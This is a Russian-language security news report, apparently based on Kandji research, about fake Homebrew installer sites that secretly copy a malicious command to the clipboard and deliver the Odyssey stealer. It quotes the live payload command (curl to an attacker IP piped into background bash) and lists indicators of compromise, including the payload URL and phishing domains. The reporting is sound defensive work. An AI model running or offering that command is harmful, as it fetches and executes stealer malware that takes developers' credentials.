Сентябрь 2025 года ознаменовался новой тревожной тенденцией в кибербезопасности - исследователи компании Kandji обнаружили растущее количество поддельных сайтов установщика Homebrew, которые точно копируют официальную страницу brew.sh. Эти реплики внедряют вредоносные нагрузки под видом стандартной процедуры установки популярного менеджера пакетов для macOS.
Описание
Пока сообщество безопасности сосредоточено на уязвимостях в NPM, PyPI и других системах управления пакетами, где регулярно обнаруживаются опечаточные домены (typosquatting) и компрометированные библиотеки, Homebrew оставался в относительной тени. Однако текущая ситуация демонстрирует, что злоумышленники нашли более прямой способ атаковать пользователей - через фишинговые веб-сайты.
Только за последнюю неделю исследователи Kandji идентифицировали четыре домена, связанных с Homebrew, включая homebrewoneline[.]org, которые перенаправляли на IP-адрес 38[.]146[.]27[.]144. Эти сайты представляли собой точные копии официальной страницы установки Homebrew, но с ключевым отличием: вместо возможности выделить и скопировать команду установки вручную, страница принуждала пользователей использовать единственную кнопку «Copy». Это ограничение оказалось преднамеренным - оно позволяло злоумышленникам внедрять скрытую команду в буфер обмена, не отображаемую на веб-странице.
1 | curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash & |
Техника атаки тесно перекликается с недавними кампаниями социальной инженерии «ClickFix», где жертв вынуждали вставлять в терминал команды, предоставленные атакующими, часто под предлогом решения CAPTCHA. Результатом становится компактный и эффективный первоначальный вектор заражения.
В нижней части индексного файла сайта исследователи обнаружили встроенный JavaScript-код, содержащий русскоязычные комментарии, которые явно указывали на место для вставки вредоносной команды и предлагали направления для эксфильтрации данных, включая Telegram. Это strongly suggests, что страница была создана для обслуживания вредоносных нагрузок как услуга. В сочетании с наблюдаемым поведением той же инфраструктуры, загружающей стилер Odyssey, артефакты указывают на активную, товарного типа операцию угроз, а не на единичный инцидент.
В одном из исследуемых экземпляров злоумышленник еще не настроил вредоносную команду, однако к моменту публикации отчета она была обновлена и включала вредоносную нагрузку cURL, закодированную в base64. Код преднамеренно блокировал контекстное меню и выделение текста, обеспечивая принудительное использование кнопки копирования.
Данная тактика не является абсолютно новой - исследователь Олден Шмидт и компания Intego ранее документировали случаи, когда стилер Cuckoo использовал поддельные страницы Homebrew для обмана пользователей. В тех случаях скрипт установки имитировал официальный процесс, но содержал вредоносные команды. Результат оказывался убедительным: жертвы полагали, что установили только Homebrew, в то время как злоумышленник получал постоянный доступ или эксфильтрировал секреты. Тревожно, что некоторые из этих поддельных страниц остаются активными в течение нескольких дней или недель до их удаления, увеличивая окно для заражения.
Значимость этой угрозы подчеркивается тем, что менеджеры пакетов, такие как Homebrew, гораздо чаще встречаются на корпоративных машинах разработчиков, чем на персональных ноутбуках обычных пользователей. Такая концентрация делает их привлекательной мишенью: компрометация машины разработчика может раскрыть учетные данные, системы сборки и внутренние артефакты, что становится настоящим сокровищем для атакующих.
Критически важно, чтобы разработчики, администраторы и конечные пользователи относились к рискам не только устанавливаемых пакетов, но и самих менеджеров пакетов. Необходимо всегда устанавливать их из официальных источников и проверять любые инструкции по установке перед выполнением однострочных команд из интернета. Группа анализа угроз Kandji продолжает мониторинг новых векторов заражения для предоставления клиентам передовой защиты в рамках своей платформы EDR (обнаружения и реагирования на инциденты). Известно, что многие поддельные домены Homebrew продолжают появляться, а репозиторий, поддерживаемый Михаилом Касимовым, содержит постоянно обновляемый список таких доменов.
Осведомленность и проверка источников загрузки остаются ключевыми мерами противодействия этой растущей угрозе, targeting сообщество разработчиков macOS через доверенные инструменты.
Индикаторы компрометации
Domains
- homebrewclubs.org
- homebrewfaq.org
- Homebrewlub.com
- homebrewonline.org
- homebrewupdate.org
URLs
- http://185.93.89.62/d/vipx69930
- https://github.com/stamparm/maltrail/blob/master/trails/static/malware/osx_atomic.txt